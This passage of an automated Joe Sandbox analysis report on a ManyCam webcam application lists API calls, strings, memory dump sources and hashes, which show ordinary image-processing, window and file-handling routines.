                                                                                                                                            • Opcode Fuzzy Hash: 2884f95fcdafe70c70ecd4019d7835bcd498a4b6d07c35c5e4d26ae6450e3503
                                                                                                                                            • Instruction Fuzzy Hash: B941CA71E096564FC318CE29C851576FBE2EFCA204F08C67EE898D7755EA30D8498B80
                                                                                                                                            APIs
                                                                                                                                            • cvError.CXCORE099(FFFFFF2D,cvCreateTrackbar,Bad trackbar maximal value,.\window_w32.cpp,000004B9), ref: 00B959C7
                                                                                                                                            • CreateToolbarEx.COMCTL32(?,40000201,00000001,00000000,00000000,00000000,00000000,00000000,00000010,00000014,00000010,00000010,00000014), ref: 00B95A4B
                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00B95A5D
                                                                                                                                            • MoveWindow.USER32(?,00000000,00000000,?,0000001E,00000001), ref: 00B95A72
                                                                                                                                            • SendMessageA.USER32(?,00000421,00000000,00000000), ref: 00B95A83
                                                                                                                                            • ShowWindow.USER32(?,00000005), ref: 00B95A8B
                                                                                                                                            • GetWindowLongA.USER32(?,000000FC), ref: 00B95AA0
                                                                                                                                            • SetWindowLongA.USER32(?,000000FC,00B95630), ref: 00B95AC3
                                                                                                                                            • SetWindowLongA.USER32(?,000000EB,00000000), ref: 00B95ACC
                                                                                                                                            • SendMessageA.USER32(?,00000418,00000000,00000000), ref: 00B95ADB
                                                                                                                                            • cvError.CXCORE099(000000E5,cvCreateTrackbar,NULL window or trackbar name,.\window_w32.cpp,000004B6), ref: 00B95D9C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$Long$ErrorMessageSend$ClientCreateMoveRectShowToolbar
                                                                                                                                            • String ID: $.\window_w32.cpp$@$Bad trackbar maximal value$Buddy%p$NULL window or trackbar name$STATIC$Trackbar%p$cvCreateTrackbar$msctls_trackbar32
                                                                                                                                            • API String ID: 2803709427-1531181224
                                                                                                                                            • Opcode ID: 98192f8386ccd037f8597c62f190d5f55432c19856bf435bf1a3fa6296ae3e04
                                                                                                                                            • Instruction ID: cff6f2596079ce48ff09b68c64ea01307c523ecbdb6b8c3de1d9cfde3c376825
                                                                                                                                            • Opcode Fuzzy Hash: 98192f8386ccd037f8597c62f190d5f55432c19856bf435bf1a3fa6296ae3e04
                                                                                                                                            • Instruction Fuzzy Hash: 31D16DB1644700AFD724DF68CD81F6BF7E5FB88B00F404A1DB68997691EB70E8048BA5
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00416740: _DebugHeapAllocator.LIBCPMTD ref: 00416795
                                                                                                                                              • Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB139
                                                                                                                                              • Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB155
                                                                                                                                              • Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB171
                                                                                                                                              • Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB1A3
                                                                                                                                              • Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB1D6
                                                                                                                                              • Part of subcall function 004CB5F0: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 004CB626
                                                                                                                                              • Part of subcall function 004CB5F0: _wmkdir.MSVCR80 ref: 004CB633
                                                                                                                                              • Part of subcall function 0040EE30: _DebugHeapAllocator.LIBCPMTD ref: 0040EE68
                                                                                                                                              • Part of subcall function 0040EE30: _DebugHeapAllocator.LIBCPMTD ref: 0040EEAA
                                                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,?,00000001,\ManyCam,00000000,00569E94,?,00569E90,?,00569E8C,?,00000000,00000000), ref: 0051221A
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 0051222B
                                                                                                                                              • Part of subcall function 0040EA00: _DebugHeapAllocator.LIBCPMTD ref: 0040EA0E
                                                                                                                                            • _DebugHeapAllocator.LIBCPMTD ref: 00512251
                                                                                                                                              • Part of subcall function 004167E0: _DebugHeapAllocator.LIBCPMTD ref: 004167EE
                                                                                                                                              • Part of subcall function 004CC140: wcscpy_s.MSVCR80 ref: 004CC168
                                                                                                                                              • Part of subcall function 004CC140: SHFileOperationW.SHELL32(00000000), ref: 004CC1BD
                                                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,NewEffect,00569EAC,?,00569E90,?,00569E8C,?,00000000,00000000,00000002,7EC02BB4), ref: 00512270
                                                                                                                                            • CreateDirectoryW.KERNEL32(00000000,?,?,?,?,00569ED4,640x480,00000000,?,00569E90,?,00569E8C,?,00000000,00000000,00000002), ref: 005122D0
                                                                                                                                            • CreateDirectoryW.KERNEL32(00000000,?,?,?,?,00569EE8,352x288,00000000,?,00569E90,?,00569E8C,?,00000000,00000000,00000002), ref: 0051234A
                                                                                                                                            • ??0CxImage@@QAE@K@Z.CXIMAGECRT(00000000,?,00569E90,?,00569E8C,?,00000000,00000000,00000002,7EC02BB4), ref: 00512372
                                                                                                                                            • ?SetFrame@CxImage@@QAEXJ@Z.CXIMAGECRT(00000000,00000000,?,00569E90,?,00569E8C,?,00000000,00000000,00000002,7EC02BB4), ref: 00512383
                                                                                                                                            • ?SetRetreiveAllFrames@CxImage@@QAEX_N@Z.CXIMAGECRT(00000001,00000000,00000000,?,00569E90,?,00569E8C,?,00000000,00000000,00000002,7EC02BB4), ref: 00512390
                                                                                                                                            • ?Load@CxImage@@QAE_NPB_WK@Z.CXIMAGECRT(00000000,00000000,00000001,00000000,00000000,?,00569E90,?,00569E8C,?,00000000,00000000,00000002,7EC02BB4), ref: 005123A6
                                                                                                                                            • ~_Mpunct.LIBCPMTD ref: 005123C8
                                                                                                                                              • Part of subcall function 004166C0: ?DestroyFrames@CxImage@@QAE_NXZ.CXIMAGECRT(?,?,0050679A,You have selected an image with the dimension larger than 3000x2000.,00000000,00000000), ref: 004166D3
                                                                                                                                              • Part of subcall function 004166C0: ?Destroy@CxImage@@QAE_NXZ.CXIMAGECRT(?,?,0050679A,You have selected an image with the dimension larger than 3000x2000.,00000000,00000000), ref: 004166DB
                                                                                                                                            • ?GetNumFrames@CxImage@@QBEJXZ.CXIMAGECRT(00000000,00000000,00000001,00000000,00000000,?,00569E90,?,00569E8C,?,00000000,00000000,00000002,7EC02BB4), ref: 005123F6
                                                                                                                                            • ?GetNumFrames@CxImage@@QBEJXZ.CXIMAGECRT(?,?,?,?,00569F04,preview.jpg,00000000,00000000,00000001,00000000,00000000,?,00569E90,?,00569E8C), ref: 00512474
                                                                                                                                            • ?SetFrame@CxImage@@QAEXJ@Z.CXIMAGECRT(00000000,00000000,00000002,7EC02BB4), ref: 005124F5
                                                                                                                                            • ?Load@CxImage@@QAE_NPB_WK@Z.CXIMAGECRT(00000000,00000000,00000000,00000000,00000002,7EC02BB4), ref: 0051250B
                                                                                                                                            • ?GetFrameDelay@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,00000000,00000002,7EC02BB4), ref: 00512516
                                                                                                                                            • ?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(?,?,?,00000000,?,?,?,?,?,00569F04,preview.jpg,00000000,00000000,00000001,00000000,00000000), ref: 005125AD
                                                                                                                                            • ?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(00000000,?,?,?,00000000,?,?,?,?,?,00569F04,preview.jpg,00000000,00000000,00000001,00000000), ref: 005125B6
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Image@@$AllocatorDebugHeap$CreateDirectoryFrames@$Frame@Load@$Delay@DestroyDestroy@FileFolderFrameHeight@MpunctOperationPathRetreiveSpecialWidth@_wmkdirwcscpy_s
                                                                                                                                            • String ID: .mce$352x288$640x480$InternalProperties$NewEffect$\ManyCam$blocked=0type_id=%dcategory_name=%screator_info=preview=%s$preview.jpg$preview.jpg
                                                                                                                                            • API String ID: 2719232945-3254136489
                                                                                                                                            • Opcode ID: edb56aa18bfe84e8b2a6fcb1c4672e86fafff6400bd075d5d8bb305b2034b014
                                                                                                                                            • Instruction ID: 9b3459efdfe137e0bd21340dd663e66a4f958181f4942486322fc66185ab85f6
                                                                                                                                            • Opcode Fuzzy Hash: edb56aa18bfe84e8b2a6fcb1c4672e86fafff6400bd075d5d8bb305b2034b014
                                                                                                                                            • Instruction Fuzzy Hash: D43219B19002599BDB24EB65CC95BEEBBB8BF44304F0041EDE509A7282DB746F84CF95
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 004078E0: GetClientRect.USER32(?,00000000), ref: 004078F1
                                                                                                                                              • Part of subcall function 00418B80: CreateSolidBrush.GDI32(7EC02BB4), ref: 00418B8B
                                                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 0040910F
                                                                                                                                            • ?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000), ref: 00409152
                                                                                                                                            • ?Draw@CxImage@@QAEJPAUHDC__@@JJJJPAUtagRECT@@_N@Z.CXIMAGECRT(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040917C
                                                                                                                                            • ?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409191
                                                                                                                                            • ?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004091BC
                                                                                                                                            • ?Draw@CxImage@@QAEJPAUHDC__@@JJJJPAUtagRECT@@_N@Z.CXIMAGECRT(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004091DB
                                                                                                                                            • ?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(000000E8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409212
                                                                                                                                            • ?Draw@CxImage@@QAEJPAUHDC__@@JJJJPAUtagRECT@@_N@Z.CXIMAGECRT(00000000,00000006,00000006,00000000,000000E8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409231
                                                                                                                                            • ?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(000000E8,00000000,00000000,00000000,00000006,00000006,00000000,000000E8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040924D
                                                                                                                                            • ?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(00000006,?,000000E8,00000000,00000000,00000000,00000006,00000006,00000000,000000E8,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409269
                                                                                                                                            • ?Draw@CxImage@@QAEJPAUHDC__@@JJJJPAUtagRECT@@_N@Z.CXIMAGECRT(00000000,-00000006,00000006,?,000000E8,00000000,00000000,00000000,00000006,00000006,00000000,000000E8,00000000,00000000,00000000,00000000), ref: 00409287
                                                                                                                                            • ?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(000000E8,00000000,00000000,00000000,-00000006,00000006,?,000000E8,00000000,00000000,00000000,00000006,00000006,00000000,000000E8,00000000), ref: 004092A3
                                                                                                                                            • ?Draw@CxImage@@QAEJPAUHDC__@@JJJJPAUtagRECT@@_N@Z.CXIMAGECRT(00000000,?,00000006,00000000,000000E8,00000000,00000000,00000000,-00000006,00000006,?,000000E8,00000000,00000000,00000000,00000006), ref: 004092C4
                                                                                                                                            • ?Draw@CxImage@@QAEJPAUHDC__@@ABUtagRECT@@PAU3@_N@Z.CXIMAGECRT(00000000,005952B0,00000000,00000000,00000000,?,00000006,00000000,000000E8,00000000,00000000,00000000,-00000006,00000006,?,000000E8), ref: 004092E7
                                                                                                                                            • memset.MSVCR80 ref: 00409647
                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00409676
                                                                                                                                            • SetTextColor.GDI32(00000000,00945121), ref: 0040968D
                                                                                                                                              • Part of subcall function 00415F90: CopyRect.USER32(?,004093A8), ref: 00415F9F
                                                                                                                                            • DrawTextW.USER32(00000000,00000000,00000000,00000018,00000020), ref: 004096E4
                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 004096F9
                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 0040971D
                                                                                                                                            • ?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(?,000000FF,000000FF,00000000,00000000,?), ref: 0040974D
                                                                                                                                            • ?Draw@CxImage@@QAEJPAUHDC__@@JJJJPAUtagRECT@@_N@Z.CXIMAGECRT(00000000,?,?,000000FF,000000FF,00000000,00000000,?), ref: 00409770
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Image@@$C__@@Draw@Utag$T@@_$Width@$Rect$Height@$ObjectSelectText$BrushClientColorCopyCreateDrawFillSolidU3@_Windowmemset
                                                                                                                                            • String ID: ,$Category:$Created by:$Name:$Select Resource File:$Tahoma$Type:$]$k
                                                                                                                                            • API String ID: 333958392-4118964679
                                                                                                                                            • Opcode ID: 57c0907e371b0e5315c579a3b0ab3a5d9bb1bc661649efe18dc397683e395b28
                                                                                                                                            • Instruction ID: c7ad2873c58e454c86f9403bdf801017c004aeaca137986ed775093af6690a25
                                                                                                                                            • Opcode Fuzzy Hash: 57c0907e371b0e5315c579a3b0ab3a5d9bb1bc661649efe18dc397683e395b28
                                                                                                                                            • Instruction Fuzzy Hash: 1712F970900258DFEB24EB64CC59BEEBB74AF55308F1081E9E10A7B291DB746E88CF55
                                                                                                                                            APIs
                                                                                                                                            • cvGetMat.CXCORE099 ref: 00B945B5
                                                                                                                                            • cvGetErrStatus.CXCORE099(?,00000000,00000000,?), ref: 00B945BF
                                                                                                                                            • cvError.CXCORE099(000000FF,cvConvertImage,Inner function failed.,.\utils.cpp,00000203,?,00000000,00000000,?), ref: 00B945DE
                                                                                                                                            • cvReleaseMat.CXCORE099(?,?,?,?,?,?,?,00000000,00000000,?), ref: 00B945EB
                                                                                                                                            • cvGetMat.CXCORE099(?,?,00000000,00000000,?,?,00000000,00000000,?), ref: 00B94607
                                                                                                                                            • cvGetErrStatus.CXCORE099(?,?,?,?,?,00000000,00000000,?), ref: 00B94615
                                                                                                                                            • cvError.CXCORE099(000000FF,cvConvertImage,Inner function failed.,.\utils.cpp,00000204,?,?,?,?,?,00000000,00000000,?), ref: 00B94634
                                                                                                                                            • cvReleaseMat.CXCORE099(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 00B94642
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorReleaseStatus
                                                                                                                                            • String ID: .\utils.cpp$Destination image must be 8u$Destination image must have 1 or 3 channels$Inner function failed.$Source image must have 1, 3 or 4 channels$Unsupported combination of input/output formats$cvConvertImage
                                                                                                                                            • API String ID: 93656100-3009054405
                                                                                                                                            • Opcode ID: aad8cc51cff400f9955dbe7b68b98d18bcdd03bf389c92e3bfcf7a21960c00b1
                                                                                                                                            • Instruction ID: 34ccedb727d2df4ceaad5087f5b3c1e47e37a5d291dd9dafcbb2a3891cbd223e
                                                                                                                                            • Opcode Fuzzy Hash: aad8cc51cff400f9955dbe7b68b98d18bcdd03bf389c92e3bfcf7a21960c00b1
                                                                                                                                            • Instruction Fuzzy Hash: EF9126B2A403006BDA10EF58DC82F2BB7D8AB95714F180AA9F45557292F771ED0987A2
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sprintf
                                                                                                                                            • String ID: Color channels$Compression$InkSet$Missing needed %s tag$Missing required "Colormap" tag$Out of memory for colormap copy$PhotometricInterpretation$Planarconfiguration$Samples/pixel$Sorry, LogL data must have %s=%d$Sorry, LogLuv data must have %s=%d or %d$Sorry, can not handle LogLuv images with %s=%d$Sorry, can not handle RGB image with %s=%d$Sorry, can not handle YCbCr images with %s=%d$Sorry, can not handle contiguous data with %s=%d, and %s=%d and Bits/Sample=%d$Sorry, can not handle image$Sorry, can not handle image with %s=%d$Sorry, can not handle separated image with %s=%d
                                                                                                                                            • API String ID: 590974362-2918685798
                                                                                                                                            • Opcode ID: a8fd80a09a35021c4afb7c8f56e659b39de9e15b5ae8c3f91dfbb29a74a09260
                                                                                                                                            • Instruction ID: 98b6e81f2783637e6c860bf6b4ab21b3552f685f34a9d2b8eefca1f282b68a37
                                                                                                                                            • Opcode Fuzzy Hash: a8fd80a09a35021c4afb7c8f56e659b39de9e15b5ae8c3f91dfbb29a74a09260
                                                                                                                                            • Instruction Fuzzy Hash: 26D11C716407006BE320BB29DC86EBB73E8EF80710F8445BEF946C6151E779F5868756
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            • PhotometricInterpretation, xrefs: 00BC5614, 00BC56A5, 00BC57B4
                                                                                                                                            • Sorry, can not handle LogLuv images with %s=%d, xrefs: 00BC5820
                                                                                                                                            • Sorry, LogLuv data must have %s=%d or %d, xrefs: 00BC57F0
                                                                                                                                            • Sorry, can not handle image with %s=%d, xrefs: 00BC57B9
                                                                                                                                            • Sorry, can not handle RGB image with %s=%d, xrefs: 00BC5705
                                                                                                                                            • InkSet, xrefs: 00BC572F
                                                                                                                                            • Sorry, can not handle YCbCr images with %s=%d, xrefs: 00BC56DE
                                                                                                                                            • Missing needed %s tag, xrefs: 00BC5619
                                                                                                                                            • Sorry, can not handle contiguous data with %s=%d, and %s=%d and Bits/Sample=%d, xrefs: 00BC56AA
                                                                                                                                            • Color channels, xrefs: 00BC5700
                                                                                                                                            • Planarconfiguration, xrefs: 00BC56D9, 00BC581B
                                                                                                                                            • Sorry, requested compression method is not configured, xrefs: 00BC55A4
                                                                                                                                            • Compression, xrefs: 00BC578F, 00BC57EB
                                                                                                                                            • Sorry, can not handle images with %d-bit samples, xrefs: 00BC583E
                                                                                                                                            • Sorry, LogL data must have %s=%d, xrefs: 00BC5794
                                                                                                                                            • Samples/pixel, xrefs: 00BC569B, 00BC5761
                                                                                                                                            • Sorry, can not handle separated image with %s=%d, xrefs: 00BC5734, 00BC5766
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sprintf
                                                                                                                                            • String ID: Color channels$Compression$InkSet$Missing needed %s tag$PhotometricInterpretation$Planarconfiguration$Samples/pixel$Sorry, LogL data must have %s=%d$Sorry, LogLuv data must have %s=%d or %d$Sorry, can not handle LogLuv images with %s=%d$Sorry, can not handle RGB image with %s=%d$Sorry, can not handle YCbCr images with %s=%d$Sorry, can not handle contiguous data with %s=%d, and %s=%d and Bits/Sample=%d$Sorry, can not handle image with %s=%d$Sorry, can not handle images with %d-bit samples$Sorry, can not handle separated image with %s=%d$Sorry, requested compression method is not configured
                                                                                                                                            • API String ID: 590974362-4190150193
                                                                                                                                            • Opcode ID: f04b48f9a5e228cde9a1f842c995e0f321c9195a98665daebe713ef427992624
                                                                                                                                            • Instruction ID: 3d48875b639b6e7c5acb261bab011a367af1b2f238ea46e2d4cfc8385d71f68a
                                                                                                                                            • Opcode Fuzzy Hash: f04b48f9a5e228cde9a1f842c995e0f321c9195a98665daebe713ef427992624
                                                                                                                                            • Instruction Fuzzy Hash: A851D5367087516BD720EB39FC49EA773E8EF80700B4448BAF589D71A0E664AC86C756
                                                                                                                                            APIs
                                                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,Dynamic), ref: 004F6C39
                                                                                                                                            • GetFileSize.KERNEL32(000000FF,00000000), ref: 004F6C72
                                                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 004F6C83
                                                                                                                                              • Part of subcall function 00416740: _DebugHeapAllocator.LIBCPMTD ref: 00416795
                                                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,?,Dynamic), ref: 004F6CD4
                                                                                                                                            Strings
                                                                                                                                            • The Resource File is corrupted. Please select another., xrefs: 004F6CE3
                                                                                                                                            • Dynamic, xrefs: 004F6C05
                                                                                                                                            • The file size is larger than the maximum allowed (10 Mb)., xrefs: 004F6C89
                                                                                                                                            • The Resource File is corrupted. Please select another., xrefs: 004F6C48
                                                                                                                                            • You have selected an image with the dimension larger than 3000x2000., xrefs: 004F6DDB
                                                                                                                                            • You have selected a file with the size larger than 3Mb., xrefs: 004F6D24
                                                                                                                                            • The Resource File is corrupted. Please select another., xrefs: 004F6D81
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$Create$AllocatorCloseDebugHandleHeapSize
                                                                                                                                            • String ID: Dynamic$The Resource File is corrupted. Please select another.$The Resource File is corrupted. Please select another.$The Resource File is corrupted. Please select another.$The file size is larger than the maximum allowed (10 Mb).$You have selected a file with the size larger than 3Mb.$You have selected an image with the dimension larger than 3000x2000.
                                                                                                                                            • API String ID: 1944681888-4013501048
                                                                                                                                            • Opcode ID: db53ed9e86c52f9cf1fd276464b43294e0c4f6e7b9bf3ea5ce6500d8ea47b909
                                                                                                                                            • Instruction ID: 602c555bb4c1e2a523d70d8c740280473e2c328c7d9138f782ffa9abfa287272
                                                                                                                                            • Opcode Fuzzy Hash: db53ed9e86c52f9cf1fd276464b43294e0c4f6e7b9bf3ea5ce6500d8ea47b909
                                                                                                                                            • Instruction Fuzzy Hash: 27613C70A00258ABDB14EF54DC96BEEBB75FB40314F50465AF91AAB2D0CB34AF81DB44
                                                                                                                                            APIs
                                                                                                                                            • capGetDriverDescriptionA.AVICAP32(?,?,00000050,?,00000050,00000000,?,?,?), ref: 00B91512
